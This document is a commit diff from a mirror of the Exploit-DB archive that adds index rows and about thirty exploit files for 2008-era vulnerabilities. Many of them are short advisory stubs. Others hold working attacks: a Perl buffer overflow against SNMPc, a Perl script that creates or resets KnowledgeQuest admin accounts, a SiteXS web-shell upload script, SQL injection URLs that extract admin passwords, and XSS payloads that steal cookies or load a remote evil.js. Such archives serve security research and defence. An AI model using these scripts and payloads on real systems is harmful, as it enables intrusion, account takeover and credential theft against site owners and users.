bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 02_19_2014

Browse source
This commit is contained in:
Offensive Security 2014-02-19 04:27:25 +00:00
parent 182f5dc596
commit bed31fb4b5
30 changed files with 473 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
files.csv
View file

@ -28343,6 +28343,7 @@ id,file,description,date,author,platform,type,port
31539,platforms/php/webapps/31539.txt,"phpAddressBook 2.0 'index.php' SQL Injection Vulnerability",2008-03-26,"Virangar Security",php,webapps,0
31540,platforms/linux/remote/31540.php,"PECL 3.0.x Alternative PHP Cache Extension 'apc_search_paths()' Buffer Overflow Vulnerability",2008-03-26,dannyp,linux,remote,0
31541,platforms/php/webapps/31541.html,"Invision Power Board 2.x 'Signature' iFrame Security Vulnerability",2008-03-26,SHAHEE_MIRZA,php,webapps,0
31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 Format String Vulnerability and Multiple Denial of Service Vulnerabilities",2008-03-26,"Luigi Auriemma",multiple,dos,0
31543,platforms/php/webapps/31543.txt,"GeeCarts show.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0
31544,platforms/php/webapps/31544.txt,"GeeCarts search.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0
31545,platforms/php/webapps/31545.txt,"GeeCarts view.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0
@ -28351,6 +28352,9 @@ id,file,description,date,author,platform,type,port
31549,platforms/php/webapps/31549.txt,"JAF CMS 4.0.0 RC2 'website' and 'main_dir' Parameters Multiple Remote File Include Vulnerabilities",2008-03-27,XxX,php,webapps,0
31550,platforms/bsd/dos/31550.c,"Multiple BSD Platforms 'strfmon()' Function Integer Overflow Weakness",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0
31551,platforms/multiple/remote/31551.txt,"Apache Tomcat 4.0.3 Requests Containing MS-DOS Device Names Information Disclosure Vulnerability",2005-10-14,"security curmudgeon",multiple,remote,0
31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 X.509sat Dissector Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0
31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 LDAP Dissector Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0
31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 SCCP Dissector Decode As Feature Unspecified DoS",2008-03-28,"Peter Makrai",linux,dos,0
31555,platforms/php/webapps/31555.txt,"Simple Machines Forum <= 1.1.4 Multiple Remote File Include Vulnerabilities",2008-03-28,Sibertrwolf,php,webapps,0
31556,platforms/php/webapps/31556.txt,"Cuteflow Bin 1.5 pages/showtemplates.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0
31557,platforms/php/webapps/31557.txt,"Cuteflow Bin 1.5 pages/editmailinglist_step1.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0
@ -28359,6 +28363,7 @@ id,file,description,date,author,platform,type,port
31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 pages/showfields.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0
31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 pages/showuser.php language Parameter XSS",2008-03-29,hadihadi,php,webapps,0
31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP service Directory Traversal Vulnerability",2008-03-29,"Luigi Auriemma",windows,remote,0
31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 Multiple Remote Denial Of Service and Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 'jax_linklists.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0
31565,platforms/php/webapps/31565.txt,"@lex Guestbook <= 4.0.5 setup.php language_setup Parameter XSS",2008-03-31,ZoRLu,php,webapps,0
31566,platforms/php/webapps/31566.txt,"@lex Guestbook <= 4.0.5 index.php test Parameter XSS",2008-03-31,ZoRLu,php,webapps,0
@ -28377,12 +28382,14 @@ id,file,description,date,author,platform,type,port
31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 'jax_guestbook.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0
31581,platforms/php/webapps/31581.txt,"PhpGKit 0.9 'connexion.php' Remote File Include Vulnerability",2008-03-31,ZoRLu,php,webapps,0
31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 'catID' Parameter SQL Injection Vulnerability",2008-03-31,RMx,asp,webapps,0
31583,platforms/windows/remote/31583.txt,"Microsoft Crypto API X.509 Certificate Validation Remote Information Disclosure Vulnerability",2008-03-31,"Alexander Klink",windows,remote,0
31584,platforms/php/webapps/31584.txt,"Terracotta 'index.php' Local File Include Vulnerability",2008-04-01,"Joseph Giron",php,webapps,0
31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/VISTA/2000/2003/2008 Kernel Usermode Callback Local Privilege Escalation Vulnerability (1)",2008-04-08,Whitecell,windows,dos,0
31587,platforms/php/webapps/31587.txt,"EasySite 2.0 browser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0
31588,platforms/php/webapps/31588.txt,"EasySite 2.0 image_editor.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0
31589,platforms/php/webapps/31589.txt,"EasySite 2.0 skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0
31590,platforms/php/webapps/31590.txt,"DivXDB 2002 0.94b Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps,0
31591,platforms/linux/remote/31591.txt,"LANDesk Management Suite 8.80.1.1 PXE TFTP Service Directory Traversal Vulnerability",2008-04-02,"Luigi Auriemma",linux,remote,0
31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 XDR Prototype Hijacking Denial of Service Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0
31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 'ieframe.dll' Script Injection Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0
31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0
@ -28419,6 +28426,8 @@ id,file,description,date,author,platform,type,port
31626,platforms/php/webapps/31626.txt,"Prozilla Software Index 1.1 SQL Injection Vulnerability",2008-04-05,t0pP8uZz,php,webapps,0
31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 File Descriptor Remote Denial of Service Vulnerability",2008-04-08,"Milen Rangelov",unix,dos,0
31628,platforms/php/webapps/31628.txt,"Swiki 1.5 HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0
31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x 'ovspmd' Buffer Overflow Vulnerability",2008-04-08,"Luigi Auriemma",windows,dos,0
31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/ 9.0.x SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution Vulnerability",2008-04-08,"Javier Vicente Vallejo",linux,remote,0
31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 'gid' Parameter SQL Injection Vulnerability",2008-04-09,MantiS,php,webapps,0
31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 Picture Source HTML Injection Vulnerability",2008-04-09,OneIdBeagl3,windows,remote,0
31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon 'functions_portal.php' Remote File Include Vulnerability",2008-04-09,bd0rk,php,webapps,0
@ -28454,6 +28463,7 @@ id,file,description,date,author,platform,type,port
31664,platforms/php/webapps/31664.txt,"EsContacts 1.0 login.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0
31665,platforms/php/webapps/31665.txt,"EsContacts 1.0 search.php msg Parameter XSS",2008-04-17,ZoRLu,php,webapps,0
31666,platforms/asp/webapps/31666.txt,"CoBaLT 2.0 'adminler.asp' SQL Injection Vulnerability",2008-04-17,U238,asp,webapps,0
31667,platforms/windows/local/31667.txt,"Microsoft Windows SeImpersonatePrivilege Local Privilege Escalation Vulnerability",2008-04-17,"Cesar Cerrudo",windows,local,0
31668,platforms/php/webapps/31668.txt,"TLM CMS 3.1 Multiple SQL Injection Vulnerabilities",2008-04-18,ZoRLu,php,webapps,0
31669,platforms/php/webapps/31669.txt,"Wikepage Opus 13 2007.2 'wiki' Parameter Cross-Site Scripting Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
31670,platforms/php/webapps/31670.txt,"WordPress <= 2.3.3 'cat' Parameter Directory Traversal Vulnerability",2008-04-18,"Gerendi Sandor Attila",php,webapps,0
@ -28464,6 +28474,7 @@ id,file,description,date,author,platform,type,port
31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 Multiple Local File Include Vulnerabilities",2008-04-19,KnocKout,php,webapps,0
31676,platforms/php/webapps/31676.txt,"Host Directory PRO Cookie Security Bypass Vulnerability",2008-04-20,Crackers_Child,php,webapps,0
31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 'beg' Parameter Cross Site Scripting Vulnerability",2008-04-21,ZoRLu,php,webapps,0
31678,platforms/php/webapps/31678.txt,"SMF <= 1.1.4 Audio CAPTCHA Security Bypass Vulnerability",2008-04-21,"Michael Brooks",php,webapps,0
31679,platforms/php/webapps/31679.txt,"PortailPHP 2.0 'mod_search' Remote File Include Vulnerability",2008-04-21,ZoRLu,php,webapps,0
31681,platforms/php/webapps/31681.py,"XOOPS 2.0.14 Article Module 'article.php' SQL Injection Vulnerability",2008-04-21,Cr@zy_King,php,webapps,0
31682,platforms/php/webapps/31682.txt,"S9Y Serendipity 1.3 Referer HTTP Header XSS",2008-04-22,"Hanno Boeck",php,webapps,0
@ -28491,3 +28502,21 @@ id,file,description,date,author,platform,type,port
31711,platforms/windows/dos/31711.html,"Microsoft Excel 2007 JavaScript Code Remote Denial Of Service Vulnerability",2008-04-26,"Juan Pablo Lopez Yacubian",windows,dos,0
31712,platforms/php/webapps/31712.txt,"miniBB 2.2 'bb_admin.php' Cross-Site Scripting Vulnerability",2008-04-28,IRCRASH,php,webapps,0
31713,platforms/linux/dos/31713.py,"PeerCast 0.1218 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities",2008-04-29,"Nico Golde",linux,dos,0
31714,platforms/php/webapps/31714.txt,"C-News 1.0.1'install.php' Cross Site Scripting Vulnerability",2008-04-30,ZoRLu,php,webapps,0
31715,platforms/multiple/remote/31715.pl,"Castle Rock Computing SNMPc <= 7.0.19 Community String Stack Based Buffer Overflow Vulnerability",2008-11-11,"raveen Darshanam",multiple,remote,0
31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0
31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 QT 'mjguest.php' Cross Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0
31718,platforms/php/webapps/31718.txt,"CoronaMatrix phpAddressBook 2.0 'username' Cross Site Scripting Vulnerability",2008-05-01,IRCRASH,php,webapps,0
31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0
31720,platforms/php/webapps/31720.txt,"QT-cute QuickTalk Guestbook 1.6 Multiple Cross-Site Scripting Vulnerabilities",2008-05-02,ZoRLu,php,webapps,0
31721,platforms/php/webapps/31721.txt,"EJ3 BlackBook 1.0 footer.php Multiple Parameter XSS",2008-05-02,IRCRASH,php,webapps,0
31722,platforms/php/webapps/31722.txt,"EJ3 BlackBook 1.0 header.php Multiple Parameter XSS",2008-05-02,IRCRASH,php,webapps,0
31723,platforms/php/webapps/31723.txt,"Alumni 1.0.8/1.0.9 info.php id Parameter SQL Injection",2008-05-02,hadihadi,php,webapps,0
31724,platforms/php/webapps/31724.txt,"Alumni 1.0.8/1.0.9 index.php year Parameter XSS",2008-05-02,hadihadi,php,webapps,0
31725,platforms/php/webapps/31725.txt,"Zen Cart 2008 index.php keyword Parameter SQL Injection",2008-05-02,"Ivan Sanchez",php,webapps,0
31726,platforms/php/webapps/31726.txt,"Zen Cart 2008 index.php keyword Parameter XSS",2008-05-02,"Ivan Sanchez",php,webapps,0
31727,platforms/php/webapps/31727.txt,"ChiCoMaS 2.0.4 'index.php' Cross Site Scripting Vulnerability",2008-05-02,"Hadi Kiamarsi",php,webapps,0
31729,platforms/php/webapps/31729.pl,"SiteXS CMS 0.0.1 'upload.php' Arbitrary File Upload Vulnerability",2008-05-03,"Hadi Kiamarsi",php,webapps,0
31730,platforms/php/webapps/31730.txt,"GEDCOM_TO_MYSQL php/prenom.php Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
31731,platforms/php/webapps/31731.txt,"GEDCOM_TO_MYSQL php/index.php nom_branche Parameter XSS",2008-05-05,ZoRLu,php,webapps,0
31732,platforms/php/webapps/31732.txt,"GEDCOM_TO_MYSQL php/info.php Multiple Parameter XSS",2008-05-05,ZoRLu,php,webapps,0

Can't render this file because it is too large.

9
platforms/linux/dos/31552.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28485/info
Wireshark is prone to multiple denial-of-service vulnerabilities.
Exploiting these issues may allow attackers to cause crashes and deny service to legitimate users of the application. Attackers may be able to leverage some of these vulnerabilities to execute arbitrary code, but this has not been confirmed.
These issues affect Wireshark 0.99.2 up to and including 0.99.8.
http://www.exploit-db.com/sploits/31552.pcap

9
platforms/linux/dos/31553.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28485/info
Wireshark is prone to multiple denial-of-service vulnerabilities.
Exploiting these issues may allow attackers to cause crashes and deny service to legitimate users of the application. Attackers may be able to leverage some of these vulnerabilities to execute arbitrary code, but this has not been confirmed.
These issues affect Wireshark 0.99.2 up to and including 0.99.8.
http://www.exploit-db.com/sploits/31553.pcap

9
platforms/linux/dos/31554.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28485/info
Wireshark is prone to multiple denial-of-service vulnerabilities.
Exploiting these issues may allow attackers to cause crashes and deny service to legitimate users of the application. Attackers may be able to leverage some of these vulnerabilities to execute arbitrary code, but this has not been confirmed.
These issues affect Wireshark 0.99.2 up to and including 0.99.8.
http://www.exploit-db.com/sploits/31554.gz

9
platforms/linux/remote/31591.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28577/info
LANDesk Management Suite is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue allows an attacker to access arbitrary files outside of the TFTP application's root directory. This can expose sensitive information that could help the attacker launch further attacks.
LANDesk Management Suite 8.80.1.1 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/31591.zip

9
platforms/linux/remote/31630.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28694/info
Adobe Flash Player is prone to a remote code-execution vulnerability when handling certain embedded ActionScript objects.
An attacker may exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.
Adobe Flash Player 9.0.115.0 and earlier versions are affected.
http://www.exploit-db.com/sploits/31630.rar

9
platforms/multiple/dos/31542.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28468/info
IBM solidDB is prone to a format-string vulnerability affecting the logging function and three denial-of-service vulnerabilities.
Attackers can exploit these issues to execute arbitrary code or to deny service to legitimate users.
solidDB 06.00.1018 is vulnerable; other versions may also be affected.
http://www.exploit-db.com/sploits/31542.zip

70
platforms/multiple/remote/31715.pl Executable file
View file

@ -0,0 +1,70 @@
source: http://www.securityfocus.com/bid/28990/info
Castle Rock Computing SNMPc is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers can leverage this issue to execute arbitrary code in the context of the application, which typically runs with LocalSystem privileges. Successful exploits will compromise affected computers. Failed attacks will likely cause denial-of-service conditions.
Versions prior to SNMPc 7.1.1 are vulnerable.
#!usr/bin/perl -w
################################################################################################################
# Stack-based buffer overflow in the Network Manager in Castle Rock Computing SNMPc 7.1 and
# earlier allows remote attackers to cause a denial of service (crash) or execute arbitrary code
# via a long community string in an SNMP TRAP packet.
#
# Refer:
# http://web.nvd.nist.gov/view/vuln/detail?execution=e3s1
# http://www.securityfocus.com/bid/28990/discuss
#
#
# To run this exploit on MS Windows replace "#!usr/bin/perl -w" with "#!Installation_path_for_perl -w"
# (say #!C:/Program Files/Perl/bin/perl -w)
#
# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
#
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Date: 11th November, 2008
#
# NOTE: Thanks to all my colleagues at iPolicy
# For reliable security solutions please visit http://www.ipolicynetworks.com/
#
##################################################################################################################
use Net::SNMP;
printf("Enter the IP Adress of Vulnerable SNMP Manager ");
$host_vulnerable = <STDIN>;
$port = 162;
$community = "D" x 19500;
($session, $error) = Net::SNMP->session(
-hostname => $host_vulnerable,
-port => $port,
-community => $community, # v1/v2c
-maxmsgsize => 65535,
);
if (!defined($session))
{
printf("ERROR: %s.\n", $error);
exit 1;
}
$ipaddress = "172.16.16.4";
#Throwing an error without Agent so randomly assigned value to $ipaddress
$result = $session->trap(
-agentaddr => $ipaddress,
);
if (!defined($result))
{
printf("ERROR: %s.\n", $session->error);
$session->close;
exit 1;
}
$session->close;

7
platforms/php/webapps/31678.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28866/info
SMF (Simple Machine Forum) is prone to a security-bypass vulnerability that occurs in the audio CAPTCHA protocol.
Successfully exploiting this issue may allow attackers to send unsolicited spam or perform other automated attacks.
http://www.exploit-db.com/sploits/31678.zip

7
platforms/php/webapps/31714.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28989/info
C-News is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/install.php?etape=[XSS]

29
platforms/php/webapps/31716.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/29001/info
VWar is prone to multiple remote vulnerabilities, including:
- Multiple HTML-injection vulnerabilities
- An SQL-injection vulnerability
- An unauthorized-access vulnerability
- A vulnerability that allows attackers to brute-force authentication credentials
An attacker can exploit these issues to compromise the affected application, gain unauthorized access to the application, execute arbitrary script code, steal cookie-based authentication credentials, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks are also possible.
VWar 1.6.1 R2 is vulnerable; other versions may also be affected.
POST /vwar/article.php?rate=1 HTTP/1.1
Host: mydomain.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.13)
Gecko/20080311 Firefox/2.0.0.13
Accept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://mydomain.com/vwar/article.php?articleid=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
ratearticleselect=5, article = char(78,71,83,32,84,69,83,84)

10
platforms/php/webapps/31717.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29002/info
MJGUEST is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
MJGUEST 6.7 GT is vulnerable; other versions may also be affected.
http://www.example.com/mjguest/mjguest.php?do=redirect&level=>"<[XSS]

9
platforms/php/webapps/31718.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29005/info
phpAddressBook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
phpAddressBook 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/pad/?username="<[XSS]

88
platforms/php/webapps/31719.pl Executable file
View file

@ -0,0 +1,88 @@
source: http://www.securityfocus.com/bid/29012/info
KnowledgeQuest is prone to multiple authentication-bypass vulnerabilities.
Attackers can leverage these issues to compromise the application, which could aid in other attacks.
KnowledgeQuest 2.6 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# KnowledgeBase 2.6 Remote Multiple Vulnerabilities Exploit
# Author: Cod3rZ
# http://cod3rz.helloweb.eu
use HTTP::Request::Common;
use LWP::UserAgent;
system('cls');
#system('clear');
$lwp = new LWP::UserAgent;
$site = $ARGV[0];
print " ---------------------------------------------------------------------\n";
print " :: KnowledgeQuest 2.6 Multiple Vulnerabilities Exploit :: \n";
print " ---------------------------------------------------------------------\n";
print " Author : Cod3rZ \n";
print " Site : http://devilsnight.altervista.org \n";
print " Site : http://cod3rz.helloweb.eu \n";
print " ---------------------------------------------------------------------\n";
if(!$site) {
print " Usage: perl kb.pl [site]\n";
}
else {
if ($site !~ /http:\/\//) { $site = "http://".$site; }
print " Select: \n";
print " ---------------------------------------------------------------------\n";
print " 1 - Add Admin \n";
print " 2 - Edit Admin \n";
print " ---------------------------------------------------------------------\n";
print " Your Option: ";
$choose = <STDIN>;
if($choose == 1) {
print " ---------------------------------------------------------------------\n";
print " Your Nick: ";
chomp($user = <STDIN>);
print " Your Pass: ";
chomp($pass = <STDIN>);
$ua = $lwp->request(POST $site.'/admincheck.php',
[
username => $user,
password => $pass,
repas => $pass,
Submit => "Sign+Up"
]);
@content = $ua->content =~ /Author Registration/;
if(@content) {
print " ---------------------------------------------------------------------\n";
print " Exploit successfully terminated - Admin created\n";
}
else {
print " Exploit failed\n";
}}
elsif($choose == 2){
print " ---------------------------------------------------------------------\n";
print " Admin Nick: ";
chomp($adnick = <STDIN>);
print " New Password: ";
chomp($adpass = <STDIN>);
$ua = $lwp->request(POST $site.'/editroutine.php',
[
tablename => "login",
key => "loginid",
num => $adnick,
action => "updateExec",
loginid => $adnick,
password => $adpass
]);
print " ---------------------------------------------------------------------\n";
print " Exploit successfully terminated \n";
}
}
print " ---------------------------------------------------------------------\n";
print " Cod3rZ - http://cod3rz.helloweb.eu \n";
print " ---------------------------------------------------------------------\n";

17
platforms/php/webapps/31720.txt Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/29013/info
QT-cute QuickTalk Guestbook is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
QuickTalk Guestbook 1.6 is vulnerable; other versions may also be affected.
http://www.example.com/quicktalk/qtf_cmd.php?a=[XSS]
http://www.example.com/quicktalk/qtf_ind_search_kw.php?title=[XSS]
http://www.example.com/quicktalk/qtf_ind_search_ov.php?a=[XSS]
http://www.example.com/quicktalk/qtf_ind_search_ov.php?a=user&id=2&n=[XSS]
http://www.example.com/quicktalk/qtf_ind_search_ov.php?a=user&id=[XSS]
http://www.example.com/quicktalk/qtf_ind_search_kw.php?title=adasdasdadasda&f=-1&al=0&at=0&s=[XSS]
http://www.example.com/quicktalk/qtf_ind_stat.php?y=[XSS]
http://www.example.com/quicktalk/qtf_ind_post.php?f=1&t=1[XSS]
http://www.example.com/quicktalk/qtf_adm_cmd.php?a=[XSS]

10
platforms/php/webapps/31721.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29015/info
BlackBook is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
BlackBook 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/blackbook/footer.php?bookCopyright=<script>alert(document.cookie)</script>
http://www.example.com/blackbook/footer.php?ver=<script>alert(document.cookie)</script>

10
platforms/php/webapps/31722.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/29015/info
BlackBook is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
BlackBook 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/blackbook/header.php?bookMetaTags="> <script>alert(document.cookie)</script>
http://www.example.com/blackbook/header.php?estiloCSS="> <script>alert(document.cookie)</script>

9
platforms/php/webapps/31723.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29019/info
Project Alumni is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Project Alumni 1.0.9; other versions may also be vulnerable.
http://www.example.com/info.php?id=&#039;/**/union/**/select/**/1,2,3,concat(alumniUserName,0x3a,char(58),alumniPassword),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/**/from/**/alumni_users/**/where/**/userType=0x61646d696e/*

9
platforms/php/webapps/31724.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29019/info
Project Alumni is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
These issues affect Project Alumni 1.0.9; other versions may also be vulnerable.
http://www.example.com/index.php?act=news&year=<script>alert(document.cookie)</script>

9
platforms/php/webapps/31725.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29020/info
Zen Cart is prone to a cross-site scripting vulnerability and an SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Zen Cart 2008 is vulnerable; other versions may also be affected.
http://www.example.com/ZenCart/index.php?main_page=advanced_search_result&search_in_description=1&zenid=bla&keyword=&#039; &#039; or 1

9
platforms/php/webapps/31726.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29020/info
Zen Cart is prone to a cross-site scripting vulnerability and an SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Zen Cart 2008 is vulnerable; other versions may also be affected.
http://www.example.com/ZenCart/index.php?main_page=advanced_search_result&search_in_description=1&zenid=bla&keyword=><script src=http://site/scripts/evil.js></script>

9
platforms/php/webapps/31727.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29025/info
ChiCoMaS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ChiCoMaS 2.0.4 is vulnerable; other versions may also be affected.
http://www.example.com/[chicomas]/index.php?q=>"><script>alert(document.cookie)</script> http://www.example.com/[chicomas]/index.php?q="><script>alert(document.cookie)</script>

24
platforms/php/webapps/31729.pl Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/29029/info
SiteXS is prone to a vulnerability that lets remote attackers upload and execute arbitrary script code because the application fails to sanitize user-supplied input.
An attacker can leverage this issue to execute arbitrary code on an affected computer with the privileges of the webserver process.
SiteXS CMS 0.1.1 Pre-Alpha is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# Author : Hadi Kiamarsi
# Discover By : Hadi Kiamarsi
# Exploit By : Hadi Kiamarsi
use LWP;
use HTTP::Request::Common;
$ua = $ua = LWP::UserAgent->new;;
$res = $ua->request(POST 'http:www.example.com/[sitexs]/adm/visual/upload.php',
Content_Type => 'form-data',
Content => [
UPLOAD => ["Your shell file path", "1.gif.php", "Content-Type" =>
"image/gif"],submit => 'true',type => 'images',path => '',process => 'true',
],
);
print $res->as_string();

8
platforms/php/webapps/31730.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/29048/info
GEDCOM_to_MySQL2 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/GEDCOM_to_MySQL2/php/prenom.php?nom_branche=[XSS]
http://www.example.com/GEDCOM_to_MySQL2/php/prenom.php?nom=[XSS]

7
platforms/php/webapps/31731.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/29048/info
